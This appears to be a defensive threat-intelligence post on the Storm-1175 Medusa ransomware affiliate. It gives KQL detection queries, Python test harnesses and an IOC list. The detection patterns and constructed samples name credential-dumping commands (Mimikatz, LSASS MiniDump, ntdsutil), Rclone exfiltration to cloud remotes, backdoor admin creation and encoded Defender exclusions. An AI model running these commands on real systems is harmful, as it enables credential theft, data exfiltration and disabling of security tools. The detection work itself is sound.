Actor: Storm-1175
Motivation: Financial / Medusa RaaS affiliate
Targets: Healthcare, Education, Finance, Professional Services — AU, UK, US
Dwell time: 24 hours (min) to 5–6 days (typical)
Classification: TLP:WHITE

Overview

Storm-1175 is a financially motivated cybercriminal actor operating high-velocity ransomware campaigns as an affiliate of the Medusa ransomware-as-a-service (RaaS) platform. The group weaponises N-day and occasional zero-day vulnerabilities in internet-facing systems during the critical window between vulnerability disclosure and widespread patch adoption, achieving initial access to domains spanning healthcare, education, professional services, and finance — primarily across Australia, the United Kingdom, and the United States.

Storm-1175's most defining characteristic is tempo: the actor has moved from initial exploitation to full Medusa ransomware deployment in under 24 hours in documented intrusions, though a five-to-six day dwell time is more typical. The KQL detections in this post target Microsoft Sentinel and Microsoft Defender for Endpoint across the attacker's full kill chain.

Key Risks

Rapid N-day Weaponisation

Storm-1175 has exploited vulnerabilities in as little as one day after public disclosure — CVE-2025-31324 (SAP NetWeaver) was weaponised the day after it was published. Over 16 CVEs have been exploited since 2023 across Exchange, Ivanti, ConnectWise, SimpleHelp, CrushFTP, GoAnywhere MFT, and more.

Double Extortion via Medusa RaaS

Stolen data is staged with Bandizip and exfiltrated using Rclone to attacker-controlled cloud storage before encryption. Files are held for ransom on a Medusa leak site, threatening public release if payment is not made.

Credential and Active Directory Compromise

Storm-1175 pivots to Domain Controllers to dump NTDS.dit, SAM hives, and LSASS memory for offline cracking. Veeam backup credentials are also harvested to extend ransomware reach to connected backup infrastructure.

Security Tool Tampering

The actor modifies Microsoft Defender Antivirus registry keys and adds the entire C:\ drive to exclusion paths via encoded PowerShell before deploying ransomware payloads, eliminating the primary detection layer on targeted endpoints.

KQL Detections

The following queries target Microsoft Sentinel and Microsoft Defender for Endpoint. Each maps to the relevant MITRE ATT&CK technique and covers a distinct phase of the Storm-1175 attack chain.

1. Web Shell Creation on Internet-Facing Servers (Initial Access)
MITRE ATT&CK: T1190, T1505.003

Storm-1175 drops web shells immediately after exploiting vulnerable web-facing applications (Exchange, Ivanti, TeamCity, ScreenConnect, CrushFTP, GoAnywhere, SmarterMail, BeyondTrust). This query detects file writes to common web-accessible directories by web server worker processes. Tune the folder path list to match your environment's IIS, Tomcat, or application paths.

DeviceFileEvents
| where InitiatingProcessFileName has_any (
    "w3wp.exe", "tomcat.exe", "java.exe",
    "httpd.exe", "nginx.exe", "php-cgi.exe"
    )
| where ActionType in ("FileCreated", "FileModified")
| where FileName has_any (".aspx", ".ashx", ".php", ".jsp", ".jspx")
| where FolderPath has_any (
    @"inetpub\wwwroot", @"webapps\",
    @"htdocs\", @"public_html\", @"\owa\"
    )
| project TimeGenerated, DeviceName, FolderPath, FileName,
         InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc

2. New Local Admin Account Created via Net Commands (Persistence)
MITRE ATT&CK: T1136.001, T1098

On the initially compromised device, Storm-1175 consistently creates a new user account and immediately adds it to the local administrators group using net user /add and net localgroup administrators /add. This query correlates both commands within a five-minute window on the same device, reducing false positives from legitimate IT provisioning.

DeviceProcessEvents
| where FileName in~ ("net.exe", "net1.exe")
// keep both the account-creation and the group-add commands so the
// summarize step below can see them in the same window
| where ProcessCommandLine has_any ("user", "localgroup")
      and ProcessCommandLine has "/add"
| summarize
    Commands   = make_set(ProcessCommandLine),
    FirstSeen  = min(TimeGenerated),
    LastSeen   = max(TimeGenerated),
    EventCount = count()
    by DeviceName, bin(TimeGenerated, 5m)
| where // Both user creation and group add occurred
    Commands has "localgroup" and Commands has "administrators"
| extend DwellSeconds = datetime_diff('second', LastSeen, FirstSeen)
| project FirstSeen, DeviceName, Commands, DwellSeconds, EventCount
| order by FirstSeen desc
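The following Python is an added example, not part of the original post: it re-implements the correlation logic of detection 2 (5-minute bins per device, both a user-creation and an administrators group-add command required) so the rule can be unit-tested against constructed process events before it is deployed as KQL. The `has_term` helper approximates KQL `has`; the events and host names are constructed.

```python
# Added example (not part of the original post): offline re-implementation of
# detection 2's correlation logic for testing against constructed process events.
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    time: datetime
    device: str
    file_name: str
    cmdline: str


# Constructed sample telemetry (not real Storm-1175 data).
SAMPLE_EVENTS = [
    ProcEvent(datetime(2026, 3, 1, 2, 14, 5), "FS01", "net.exe",
              "net user svc_backup P@ssw0rd! /add"),
    ProcEvent(datetime(2026, 3, 1, 2, 14, 9), "FS01", "net1.exe",
              "net1 localgroup administrators svc_backup /add"),
    # creation and elevation 30 minutes apart: different 5-minute bins, no hit
    ProcEvent(datetime(2026, 3, 1, 9, 0, 0), "WS22", "net.exe",
              "net user helpdesk_tmp Temp123 /add"),
    ProcEvent(datetime(2026, 3, 1, 9, 30, 0), "WS22", "net.exe",
              "net localgroup administrators helpdesk_tmp /add"),
    # enumeration only, no /add
    ProcEvent(datetime(2026, 3, 1, 11, 0, 0), "DC01", "net.exe", "net user /domain"),
]


def has_term(text: str, term: str) -> bool:
    """Approximation of KQL `has`: case-insensitive match on a whole term."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(term) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def bin_time(t: datetime, minutes: int) -> datetime:
    """Equivalent of KQL bin(TimeGenerated, 5m): floor to the window boundary."""
    t = t.replace(second=0, microsecond=0)
    return t - timedelta(minutes=t.minute % minutes)


def detect_local_admin_creation(events, window_minutes: int = 5):
    """Return one finding per (device, window) that saw both a `net user ... /add`
    and a `net localgroup administrators ... /add`."""
    buckets = defaultdict(list)
    for ev in events:
        if ev.file_name.lower() not in ("net.exe", "net1.exe"):
            continue
        # Filtering on "user" alone would never admit the localgroup command,
        # so both verbs are accepted here; the aggregation then requires both.
        if not has_term(ev.cmdline, "/add"):
            continue
        if not (has_term(ev.cmdline, "user") or has_term(ev.cmdline, "localgroup")):
            continue
        buckets[(ev.device, bin_time(ev.time, window_minutes))].append(ev)

    findings = []
    for (device, bucket), evs in sorted(buckets.items()):
        cmds = [e.cmdline for e in evs]
        created = any(has_term(c, "user") for c in cmds)
        elevated = any(has_term(c, "localgroup") and has_term(c, "administrators")
                       for c in cmds)
        if created and elevated:
            first, last = min(e.time for e in evs), max(e.time for e in evs)
            findings.append({
                "device": device,
                "window_start": bucket,
                "commands": cmds,
                "dwell_seconds": int((last - first).total_seconds()),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_local_admin_creation(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, only FS01 produces a finding: WS22 performed both steps but thirty minutes apart, which lands them in different bins, and DC01 only enumerated. That mirrors the false-positive trade-off of the KQL: a slow, legitimate provisioning workflow is tolerated, a scripted create-and-elevate is not.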

3. Cloudflare Tunnel Masquerading as System Binary (Lateral Movement)
MITRE ATT&CK: T1036, T1021.001

Storm-1175 renames Cloudflare tunnel binaries to mimic legitimate Windows processes such as conhost.exe for covert lateral movement over RDP. This query catches instances where known Windows system binary names are executed from non-standard paths — a strong indicator of masquerading.

DeviceProcessEvents
| where FileName in~ (
    "conhost.exe", "svchost.exe", "lsass.exe",
    "csrss.exe", "services.exe", "explorer.exe"
    )
| where FolderPath !startswith @"C:\Windows\System32"
      and FolderPath !startswith @"C:\Windows\SysWOW64"
      and FolderPath !startswith @"C:\Windows\WinSxS"
      // explorer.exe legitimately runs from the Windows root, not System32
      and not (FileName =~ "explorer.exe" and FolderPath =~ @"C:\Windows")
| extend
    IsFromTemp  = FolderPath has_any (@"\Temp\", @"\AppData\", @"\ProgramData\"),
    ProcessHash = SHA256
| project TimeGenerated, DeviceName, FileName, FolderPath,
         ProcessCommandLine, IsFromTemp, ProcessHash
| order by TimeGenerated desc
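As an added example (not part of the original post), the Python below shows the exact-directory form of the check in detection 3. The KQL uses prefix matching, so a directory such as C:\Windows\System32Fake\ would pass the exclusion, and explorer.exe, which legitimately lives in C:\Windows rather than System32, needs its own expected location. The allowlist of expected directories, the WinSxS tolerance and the sample records are assumptions of this example.

```python
# Added example (not part of the original post): exact-directory masquerading check
# for the system-binary names monitored by detection 3.
import ntpath

# Directories each monitored binary is expected to run from (assumed allowlist).
EXPECTED_DIRS = {
    "conhost.exe":  {r"C:\Windows\System32", r"C:\Windows\SysWOW64"},
    "svchost.exe":  {r"C:\Windows\System32", r"C:\Windows\SysWOW64"},
    "lsass.exe":    {r"C:\Windows\System32"},
    "csrss.exe":    {r"C:\Windows\System32"},
    "services.exe": {r"C:\Windows\System32"},
    "explorer.exe": {r"C:\Windows", r"C:\Windows\SysWOW64"},
}
WINSXS = r"c:\windows\winsxs"
USER_WRITABLE_MARKERS = ("\\temp\\", "\\appdata\\", "\\programdata\\")


def normalise_dir(folder: str) -> str:
    """Collapse '..', forward slashes and trailing separators, then lower-case,
    so that C:/Windows/System32/ and C:\\Windows\\System32 compare equal."""
    return ntpath.normpath(folder.strip()).rstrip("\\").lower()


def is_masquerading(file_name: str, folder_path: str):
    """True if a monitored system-binary name runs from an unexpected directory,
    False if it runs from an expected one, None if the name is not monitored."""
    name = file_name.lower()
    if name not in EXPECTED_DIRS:
        return None
    folder = normalise_dir(folder_path)
    # Component-store copies under WinSxS are tolerated, as in the KQL.
    if folder == WINSXS or folder.startswith(WINSXS + "\\"):
        return False
    return folder not in {d.lower() for d in EXPECTED_DIRS[name]}


def from_user_writable(folder_path: str) -> bool:
    """Mirror of the IsFromTemp flag: Temp, AppData or ProgramData in the path."""
    folder = normalise_dir(folder_path) + "\\"
    return any(marker in folder for marker in USER_WRITABLE_MARKERS)


# Constructed sample process records: (FileName, FolderPath).
SAMPLE_PROCESSES = [
    ("conhost.exe", r"C:\Windows\System32"),
    ("conhost.exe", r"C:\Windows\System32Fake"),       # prefix match would miss this
    ("conhost.exe", r"C:\Users\Public\AppData\Roaming"),
    ("explorer.exe", r"C:\Windows"),                    # legitimate; prefix logic flags it
    ("explorer.exe", r"C:\ProgramData\Update"),
    ("svchost.exe", r"C:\Windows\WinSxS\example_component"),
]


def triage(records):
    """Annotate each record with the masquerading verdict and the user-writable flag."""
    return [(name, path, is_masquerading(name, path), from_user_writable(path))
            for name, path in records]


if __name__ == "__main__":
    for row in triage(SAMPLE_PROCESSES):
        print(row)
```

In KQL the equivalent tightening is to compare `FolderPath` with `=~` against the expected directory per file name rather than `!startswith` against a prefix, and to keep the separate Temp/AppData/ProgramData flag for triage priority.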

4. WDigest Credential Caching Enabled via Registry (Credential Access)
MITRE ATT&CK: T1003.001, T1112

Storm-1175 modifies the UseLogonCredential registry value under the WDigest provider to force Windows to cache plaintext credentials in LSASS memory, which are then harvested using Mimikatz or Impacket. Local administrator privileges are required for this modification, so any alert should prompt review of account privilege escalation activity on the same host.

DeviceRegistryEvents
| where RegistryKey has "WDigest"
      and RegistryValueName =~ "UseLogonCredential"
      and RegistryValueData =~ "1"
| extend
    Actor = InitiatingProcessAccountName,
    Cmd   = InitiatingProcessCommandLine
| project TimeGenerated, DeviceName, RegistryKey,
         RegistryValueData, Actor, Cmd,
         InitiatingProcessFileName
| order by TimeGenerated desc

5. LSASS and NTDS Credential Dumping (Credential Access)
MITRE ATT&CK: T1003.001, T1003.003

Storm-1175 dumps credentials from LSASS using Task Manager, Mimikatz, and Impacket, and accesses the NTDS.dit Active Directory database from compromised Domain Controllers for offline cracking. This query covers the following technique variants: Task Manager LSASS dumps, comsvcs.dll MiniDump invocations, ntdsutil NTDS.dit extraction, and Mimikatz command-line indicators.

DeviceProcessEvents
| where (
    // Task Manager LSASS dump
    (FileName =~ "taskmgr.exe"
     and ProcessCommandLine has "lsass")
    // comsvcs MiniDump technique
    or (ProcessCommandLine has_all ("comsvcs.dll", "MiniDump", "lsass"))
    // ntdsutil NTDS.dit extraction
    or (FileName =~ "ntdsutil.exe"
        and ProcessCommandLine has_any ("ac i ntds", "ifm", "create full"))
    // Mimikatz indicators
    or ProcessCommandLine has_any (
        "sekurlsa::logonpasswords",
        "lsadump::sam", "lsadump::dcsync"
        )
    )
| project TimeGenerated, DeviceName, FileName,
         ProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc

6. Defender Antivirus Tampering and Firewall RDP Enablement (Defence Evasion)
MITRE ATT&CK: T1562.001, T1562.004

Storm-1175 tampers with Microsoft Defender Antivirus registry settings and adds the C:\ drive as an exclusion path via encoded PowerShell before dropping ransomware payloads. The actor also modifies Windows Firewall rules to permit RDP when it is blocked. Both technique classes are covered by this compound query.

union
// Defender registry tampering
(
  DeviceRegistryEvents
  | where RegistryKey has "Windows Defender"
  | where RegistryKey has @"Exclusions\Paths"
       // DisableAntiSpyware and DisableRealtimeMonitoring are value names, not key paths
       or RegistryValueName in~ ("DisableAntiSpyware", "DisableRealtimeMonitoring")
  | where RegistryValueData in ("1", "C:\\", "C:/")
       // exclusion paths are stored as the value name, so keep every write under Paths
       or RegistryKey has "Paths"
  | extend AlertType = "DefenderTamper"
  | project TimeGenerated, DeviceName, RegistryKey,
           RegistryValueData, AlertType,
           InitiatingProcessCommandLine
),
// Firewall modification to allow RDP
(
  DeviceProcessEvents
  | where ProcessCommandLine has_all ("netsh", "firewall")
       and ProcessCommandLine has_any ("3389", "remote desktop", "allow")
  | extend AlertType = "FirewallRDPEnablement",
           RegistryKey = "", RegistryValueData = ""
  | project TimeGenerated, DeviceName, RegistryKey,
           RegistryValueData, AlertType,
           InitiatingProcessCommandLine = ProcessCommandLine
)
| order by TimeGenerated desc
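Detection 6 keys on the registry writes, but the actor reaches those keys through encoded PowerShell, so an analyst triaging the alert needs the decoded script. The Python below is an added example, not part of the original post: it decodes a `-EncodedCommand` payload (base64 of UTF-16LE text, with the short switch forms PowerShell accepts) and flags the Defender exclusion and disable cmdlets, including the whole-drive exclusion described above. The command lines are constructed, not captured Storm-1175 samples, and the cmdlet patterns are this example's own list.

```python
# Added example (not part of the original post): decode -EncodedCommand payloads and
# flag Defender-tampering cmdlets for triage of detection 6 alerts.
import base64
import re

# -e, -ec, -en, -enc and the full switch; PowerShell accepts unambiguous prefixes.
ENCODED_SWITCH = re.compile(
    r"-e(?:c|n|nc|ncodedcommand)?\b\s+['\"]?([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# (regex, finding label); patterns are this example's assumed watchlist.
TAMPER_PATTERNS = [
    (r"Add-MpPreference\b.*-ExclusionPath", "Defender exclusion path added"),
    (r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", "real-time monitoring disabled"),
    (r"Set-MpPreference\b.*-DisableIOAVProtection\s+\$true", "IOAV protection disabled"),
    (r"\bDisableAntiSpyware\b", "DisableAntiSpyware value referenced"),
]
# Exclusion argument that is a bare drive root such as C:\ or C:/ (the Storm-1175 pattern).
WHOLE_DRIVE = re.compile(
    r"-ExclusionPath\s+['\"]?[A-Za-z]:[\\/]?['\"]?(?=[\s,;]|$)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script when the command line carries -EncodedCommand, else None."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # not valid base64 / not UTF-16LE: treat as not an encoded command
        return None


def assess_powershell(cmdline: str) -> dict:
    """Decode if needed, then list Defender-tampering findings for the script."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    findings = [label for pat, label in TAMPER_PATTERNS
                if re.search(pat, script, re.IGNORECASE)]
    if WHOLE_DRIVE.search(script):
        findings.append("entire drive excluded")
    return {"encoded": decoded is not None, "script": script, "findings": findings}


def encode_for_sample(script: str) -> str:
    """Build a constructed sample in PowerShell's -EncodedCommand format (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not captured telemetry).
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -enc " + encode_for_sample("Add-MpPreference -ExclusionPath 'C:\\'"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "powershell.exe -e " + encode_for_sample("Set-MpPreference -DisableRealtimeMonitoring $true"),
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(assess_powershell(line))
```

Feeding `InitiatingProcessCommandLine` from the registry alert into `assess_powershell` turns an opaque base64 blob into the specific cmdlet, and a hit on "entire drive excluded" is the strongest pre-encryption signal this ruleset has, since it precedes the ransomware drop by design.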

7. Rclone Data Exfiltration to Cloud Storage (Exfiltration)
MITRE ATT&CK: T1048, T1567

Storm-1175 uses Rclone — frequently renamed to blend in, with the known hash 9632d7e4...672523c observed as lsp.exe — to synchronise victim data to attacker-controlled cloud storage throughout the intrusion. This query detects Rclone by its command-line patterns regardless of the process name, and also flags the known IOC hash directly.

DeviceProcessEvents
| where (
    // Rclone CLI patterns regardless of binary name
    ProcessCommandLine has_any (
        "--config", "--no-check-certificate",
        "--ignore-existing", "--auto-confirm"
        )
    and ProcessCommandLine has_any (
        "copy", "sync", "move", "ls"
        )
    and ProcessCommandLine has_any (
        "mega:", "drive:", "onedrive:",
        "s3:", "ftp:", "sftp:", "pcloud:"
        )
    )
    or SHA256 =~ "9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c"
| extend
    PossibleRclone = FileName,
    TargetCloud    = extract(@"(\w+):", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, PossibleRclone,
         ProcessCommandLine, TargetCloud, SHA256,
         InitiatingProcessAccountName
| order by TimeGenerated desc
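The Python below is an added example, not part of the original post. It mirrors detection 7's name-agnostic logic (Rclone flags plus a transfer verb plus a known remote type, or the lsp.exe hash from this page's IOC list) and tightens the remote extraction: the KQL's `extract(@"(\w+):", 1, ...)` also captures Windows drive letters such as `C:`, so the regex here requires a remote name of at least two characters that is not followed by a backslash. The command lines are constructed; the remote-type list is the same assumption the KQL makes, since Rclone remote names are user-chosen.

```python
# Added example (not part of the original post): name-agnostic Rclone classifier with
# a remote extractor that does not confuse drive letters with Rclone remotes.
import re

RCLONE_FLAGS = ("--config", "--no-check-certificate", "--ignore-existing", "--auto-confirm")
RCLONE_VERBS = {"copy", "sync", "move", "ls"}
KNOWN_REMOTE_TYPES = {"mega", "drive", "onedrive", "s3", "ftp", "sftp", "pcloud"}
# SHA-256 of lsp.exe (renamed Rclone) from the IOC table on this page.
RCLONE_IOC_SHA256 = "9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c"

# `name:` at the start of a token, name of two or more characters, and the
# character after the colon is not a backslash (which would make it a drive letter).
REMOTE_RE = re.compile(r"(?:^|\s)([A-Za-z][A-Za-z0-9_-]+):(?!\\)")


def extract_remote(cmdline: str):
    """Return the first Rclone-style remote name in the command line, lower-cased, or None."""
    m = REMOTE_RE.search(cmdline)
    return m.group(1).lower() if m else None


def classify_rclone(cmdline: str, sha256=None) -> dict:
    """Detection 7 in Python: flag by command-line shape regardless of file name,
    or by the known IOC hash when the process hash is available."""
    tokens = cmdline.lower().split()
    has_flag = any(t.startswith(f) for t in tokens for f in RCLONE_FLAGS)
    has_verb = any(t in RCLONE_VERBS for t in tokens)
    remote = extract_remote(cmdline)
    by_pattern = has_flag and has_verb and remote in KNOWN_REMOTE_TYPES
    by_hash = sha256 is not None and sha256.lower() == RCLONE_IOC_SHA256
    return {"rclone": by_pattern or by_hash, "by_pattern": by_pattern,
            "by_hash": by_hash, "remote": remote}


# Constructed sample records: (ProcessCommandLine, SHA256 or None).
SAMPLE_PROCESSES = [
    ("lsp.exe copy C:\\Finance\\Exports mega:loot --config C:\\ProgramData\\r.conf "
     "--no-check-certificate", None),
    ("lsp.exe sync D:\\Shares mega:victim --auto-confirm", RCLONE_IOC_SHA256),
    ("robocopy.exe C:\\Data \\\\NAS\\Backup /MIR", None),          # legitimate admin copy
    ("rclone.exe ls onedrive:Documents --config C:\\Users\\jdoe\\.config\\rclone\\rclone.conf", None),
]


if __name__ == "__main__":
    for cmdline, sha in SAMPLE_PROCESSES:
        print(classify_rclone(cmdline, sha))
```

The same tightening can be carried back into the KQL by changing the `TargetCloud` extraction to `extract(@"(?:^|\s)([A-Za-z][A-Za-z0-9_-]+):[^\\]", 1, ProcessCommandLine)`, which keeps `mega:` and `onedrive:` but drops `C:\` paths from the column.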

8. Medusa Ransomware Delivery via PDQ Deployer or Group Policy (Impact)
MITRE ATT&CK: T1486, T1484.001

Storm-1175's final stage uses PDQ Deployer to execute RunFileCopy.cmd and distribute Medusa ransomware (Gaze.exe, SHA-256: 0cefeb62...4be96) across the network, or alternatively abuses Group Policy Objects (GPOs) for broad deployment. Alert fidelity is highest when correlated with earlier-stage detections in this ruleset.

union
// PDQ Deployer launching ransomware delivery script
(
  DeviceProcessEvents
  | where InitiatingProcessFileName =~ "PDQDeployRunner.exe"
       or ProcessCommandLine has_any (
           "RunFileCopy.cmd", "Gaze.exe"
           )
       or SHA256 =~ "0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96"
  | extend DeliveryMethod = "PDQ"
  | project TimeGenerated, DeviceName, ProcessCommandLine,
           SHA256, DeliveryMethod
),
// GPO modification as alternative mass-deployment vector
(
  SecurityEvent
  | where EventID in (5136, 5137, 5141)
  | where ObjectClass =~ "groupPolicyContainer"
       or OperationType has_any (
           "Write Property", "Create Object"
           )
  | extend DeliveryMethod = "GPO",
           ProcessCommandLine = "", SHA256 = ""
  | project TimeGenerated, DeviceName = Computer,
           ProcessCommandLine, SHA256, DeliveryMethod
)
| order by TimeGenerated desc

Indicators of Compromise

Indicator                                                         Type     Description                   Last Seen
0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96  SHA-256  Gaze.exe (Medusa Ransomware)  2026-03-01
9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c  SHA-256  lsp.exe (Rclone)              2026-02-18
e57ba1a4e323094ca9d747bfb3304bd12f3ea3be5e2ee785a3e656c3ab1e8086  SHA-256  main.exe (SimpleHelp)         2026-01-15
5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19  SHA-256  moon.exe (SimpleHelp)         2025-09-22
185.135.86[.]149                                                  IP       SimpleHelp C2                 2026-03-15
134.195.91[.]224                                                  IP       SimpleHelp C2                 2026-02-26
85.155.186[.]121                                                  IP       SimpleHelp C2                 2026-02-12